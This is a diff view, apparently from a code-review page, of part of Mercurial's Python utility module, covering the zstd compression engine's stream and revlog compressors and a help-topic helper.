3636
3635
3637 With the default settings, zstd compression is both faster and yields
3636 With the default settings, zstd compression is both faster and yields
3638 better compression than ``gzip``. It also frequently yields better
3637 better compression than ``gzip``. It also frequently yields better
3639 compression than ``bzip2`` while operating at much higher speeds.
3638 compression than ``bzip2`` while operating at much higher speeds.
3640
3639
3641 If this engine is available and backwards compatibility is not a
3640 If this engine is available and backwards compatibility is not a
3642 concern, it is likely the best available engine.
3641 concern, it is likely the best available engine.
3643 """
3642 """
3644 return 'zstd', 'ZS'
3643 return 'zstd', 'ZS'
3645
3644
3646 def wireprotosupport(self):
3645 def wireprotosupport(self):
3647 return compewireprotosupport('zstd', 50, 50)
3646 return compewireprotosupport('zstd', 50, 50)
3648
3647
3649 def revlogheader(self):
3648 def revlogheader(self):
3650 return '\x28'
3649 return '\x28'
3651
3650
3652 def compressstream(self, it, opts=None):
3651 def compressstream(self, it, opts=None):
3653 opts = opts or {}
3652 opts = opts or {}
3654 # zstd level 3 is almost always significantly faster than zlib
3653 # zstd level 3 is almost always significantly faster than zlib
3655 # while providing no worse compression. It strikes a good balance
3654 # while providing no worse compression. It strikes a good balance
3656 # between speed and compression.
3655 # between speed and compression.
3657 level = opts.get('level', 3)
3656 level = opts.get('level', 3)
3658
3657
3659 zstd = self._module
3658 zstd = self._module
3660 z = zstd.ZstdCompressor(level=level).compressobj()
3659 z = zstd.ZstdCompressor(level=level).compressobj()
3661 for chunk in it:
3660 for chunk in it:
3662 data = z.compress(chunk)
3661 data = z.compress(chunk)
3663 if data:
3662 if data:
3664 yield data
3663 yield data
3665
3664
3666 yield z.flush()
3665 yield z.flush()
3667
3666
3668 def decompressorreader(self, fh):
3667 def decompressorreader(self, fh):
3669 zstd = self._module
3668 zstd = self._module
3670 dctx = zstd.ZstdDecompressor()
3669 dctx = zstd.ZstdDecompressor()
3671 return chunkbuffer(dctx.read_from(fh))
3670 return chunkbuffer(dctx.read_from(fh))
3672
3671
3673 class zstdrevlogcompressor(object):
3672 class zstdrevlogcompressor(object):
3674 def __init__(self, zstd, level=3):
3673 def __init__(self, zstd, level=3):
3675 # Writing the content size adds a few bytes to the output. However,
3674 # Writing the content size adds a few bytes to the output. However,
3676 # it allows decompression to be more optimal since we can
3675 # it allows decompression to be more optimal since we can
3677 # pre-allocate a buffer to hold the result.
3676 # pre-allocate a buffer to hold the result.
3678 self._cctx = zstd.ZstdCompressor(level=level,
3677 self._cctx = zstd.ZstdCompressor(level=level,
3679 write_content_size=True)
3678 write_content_size=True)
3680 self._dctx = zstd.ZstdDecompressor()
3679 self._dctx = zstd.ZstdDecompressor()
3681 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3680 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3682 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3681 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3683
3682
3684 def compress(self, data):
3683 def compress(self, data):
3685 insize = len(data)
3684 insize = len(data)
3686 # Caller handles empty input case.
3685 # Caller handles empty input case.
3687 assert insize > 0
3686 assert insize > 0
3688
3687
3689 if insize < 50:
3688 if insize < 50:
3690 return None
3689 return None
3691
3690
3692 elif insize <= 1000000:
3691 elif insize <= 1000000:
3693 compressed = self._cctx.compress(data)
3692 compressed = self._cctx.compress(data)
3694 if len(compressed) < insize:
3693 if len(compressed) < insize:
3695 return compressed
3694 return compressed
3696 return None
3695 return None
3697 else:
3696 else:
3698 z = self._cctx.compressobj()
3697 z = self._cctx.compressobj()
3699 chunks = []
3698 chunks = []
3700 pos = 0
3699 pos = 0
3701 while pos < insize:
3700 while pos < insize:
3702 pos2 = pos + self._compinsize
3701 pos2 = pos + self._compinsize
3703 chunk = z.compress(data[pos:pos2])
3702 chunk = z.compress(data[pos:pos2])
3704 if chunk:
3703 if chunk:
3705 chunks.append(chunk)
3704 chunks.append(chunk)
3706 pos = pos2
3705 pos = pos2
3707 chunks.append(z.flush())
3706 chunks.append(z.flush())
3708
3707
3709 if sum(map(len, chunks)) < insize:
3708 if sum(map(len, chunks)) < insize:
3710 return ''.join(chunks)
3709 return ''.join(chunks)
3711 return None
3710 return None
3712
3711
3713 def decompress(self, data):
3712 def decompress(self, data):
3714 insize = len(data)
3713 insize = len(data)
3715
3714
3716 try:
3715 try:
3717 # This was measured to be faster than other streaming
3716 # This was measured to be faster than other streaming
3718 # decompressors.
3717 # decompressors.
3719 dobj = self._dctx.decompressobj()
3718 dobj = self._dctx.decompressobj()
3720 chunks = []
3719 chunks = []
3721 pos = 0
3720 pos = 0
3722 while pos < insize:
3721 while pos < insize:
3723 pos2 = pos + self._decompinsize
3722 pos2 = pos + self._decompinsize
3724 chunk = dobj.decompress(data[pos:pos2])
3723 chunk = dobj.decompress(data[pos:pos2])
3725 if chunk:
3724 if chunk:
3726 chunks.append(chunk)
3725 chunks.append(chunk)
3727 pos = pos2
3726 pos = pos2
3728 # Frame should be exhausted, so no finish() API.
3727 # Frame should be exhausted, so no finish() API.
3729
3728
3730 return ''.join(chunks)
3729 return ''.join(chunks)
3731 except Exception as e:
3730 except Exception as e:
3732 raise error.RevlogError(_('revlog decompress error: %s') %
3731 raise error.RevlogError(_('revlog decompress error: %s') %
3733 str(e))
3732 str(e))
3734
3733
3735 def revlogcompressor(self, opts=None):
3734 def revlogcompressor(self, opts=None):
3736 opts = opts or {}
3735 opts = opts or {}
3737 return self.zstdrevlogcompressor(self._module,
3736 return self.zstdrevlogcompressor(self._module,
3738 level=opts.get('level', 3))
3737 level=opts.get('level', 3))
3739
3738
3740 compengines.register(_zstdengine())
3739 compengines.register(_zstdengine())
3741
3740
3742 def bundlecompressiontopics():
3741 def bundlecompressiontopics():
3743 """Obtains a list of available bundle compressions for use in help."""
3742 """Obtains a list of available bundle compressions for use in help."""
3744 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3743 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3745 items = {}
3744 items = {}
3746
3745
3747 # We need to format the docstring. So use a dummy object/type to hold it
3746 # We need to format the docstring. So use a dummy object/type to hold it
3748 # rather than mutating the original.
3747 # rather than mutating the original.
3749 class docobject(object):
3748 class docobject(object):
3750 pass
3749 pass
3751
3750
3752 for name in compengines:
3751 for name in compengines:
3753 engine = compengines[name]
3752 engine = compengines[name]
3754
3753
3755 if not engine.available():
3754 if not engine.available():
3756 continue
3755 continue
3757
3756
3758 bt = engine.bundletype()
3757 bt = engine.bundletype()
3759 if not bt or not bt[0]:
3758 if not bt or not bt[0]:
3760 continue
3759 continue
3761
3760
3762 doc = pycompat.sysstr('``%s``\n %s') % (
3761 doc = pycompat.sysstr('``%s``\n %s') % (
3763 bt[0], engine.bundletype.__doc__)
3762 bt[0], engine.bundletype.__doc__)
3764
3763
3765 value = docobject()
3764 value = docobject()
3766 value.__doc__ = doc
3765 value.__doc__ = doc
3767 value._origdoc = engine.bundletype.__doc__
3766 value._origdoc = engine.bundletype.__doc__
3768 value._origfunc = engine.bundletype
3767 value._origfunc = engine.bundletype
3769
3768
3770 items[bt[0]] = value
3769 items[bt[0]] = value
3771
3770
3772 return items
3771 return items
3773
3772
3774 i18nfunctions = bundlecompressiontopics().values()
3773 i18nfunctions = bundlecompressiontopics().values()
3775
3774
3776 # convenient shortcut
3775 # convenient shortcut
3777 dst = debugstacktrace
3776 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now